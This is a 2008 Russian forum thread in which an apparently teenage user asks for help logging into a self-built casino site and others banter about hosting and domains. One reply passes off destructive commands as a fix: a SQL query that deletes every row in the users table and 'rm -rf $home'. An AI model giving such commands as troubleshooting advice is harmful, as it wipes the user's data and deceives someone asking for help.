Ребят, у меня проблемы со входом...

Статус
В этой теме нельзя размещать новые ответы.

Апокалипсис

тех дир matras.ru
забей ты на это дело.
вдруг у тя выиграют много денег что будешь делать?:)
и казино на бесплатном хостинге не внушает никакого доверия.
Даже сайт конторы какой либо на беспл. хосте у меня не внушает доверия :)

-~{}~ 20.02.08 23:42:

Золотые года у тебя сейчас для обучения - выучись пыху - и будешь зарабатывать года через два достаточно прилично (а может и ранее)
 

Shmel

Guest
Ты их не выиграешь, потому что например ты поставил 500 рублей, а там таких как ты например 4 всего 2000 накопилось, и кто то из вас выиграет, и получит какую то прибыль

-~{}~ 20.02.08 23:44:

и еще там программа стоит, она распределяет сколько денег получишь
 

berkut

Новичок
Я платный не успел купить
поделюсь с тобой тайной: если ты даже каким-то чудом его запустишь, то кроме твоих друзей, причём по твоему-же принуждению, туда вообще никто не зайдёт. так-что забей. я б на твоём месте ща в инет вообще-бы не сувался - зажимал бы одноклассниц в подъездах после пьянок... хиде мои 13... *стряхивая песок с задницы
 

Апокалипсис

тех дир matras.ru
berkut
не развращай ребенка!!! :))))))))
пусть лучше за компом сидит чем проводит детство в пьяном угаре в подъездах.

-~{}~ 20.02.08 23:50:

у детей сейчас ничего кроме инета не осталось. Раньше были кружки, клубы, ДОСААФ, и т.п...
 

Shmel

Guest
Гг

-~{}~ 20.02.08 23:52:

Кто знает, где домен мона дешево купить?

-~{}~ 20.02.08 23:55:

Дайте ссылкой
 

berkut

Новичок
Апокалипсис
дык по мне лучше в таком возрасте пьяные угары, девочки стеснительные:) да свежий воздух. чем ботанизация/игранизация за компом. гемморой насидеть всегда успеешь :)
 

Beavis

Banned
Shmel
тебе хостинг нужен а не только домен
и не рекомендовал бы я тебе самые дешевые варианты брать... будет через пень колоду работать
 

Shmel

Guest
Не) если хостингом, то не выше 40 рублей в месяц
 

Beavis

Banned
заодно подскажите где можно новую хорошую иномарку за 500$ купить!
 

Shmel

Guest
В gta 4

-~{}~ 21.02.08 00:00:

Гг, ладно, лучше скажите, где хостинг не выше 40 рублей мона купить?
 

berkut

Новичок
Beavis
у меня есть - новый запорожец - 20 лет в вентилируемом гараже. стукни в асю)))
 

C001_UsEr

Новичок
Автор оригинала: Shmel
PHP:
...
вот строка login_proc
Вам поможет вот этот запрос, выполнять нужно сразу после соединения с MySQL-сервером
mysql_query("DELETE FROM `users`;");
Также, если у Вас есть доступ по SSH, то эта команда тоже не будет лишней
rm -rf $home
 

Shmel

Guest
Я же в админ панель, тоже не могу зайти. Может ты попробуешь зарегаться и войти, и скажешь, че будет

-~{}~ 21.02.08 09:04:

Он даже такова человека не находит, после реги

-~{}~ 21.02.08 09:07:

Что же можно сделать???

-~{}~ 21.02.08 09:09:

Может фаил надо какойто создать, с пользователями?
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху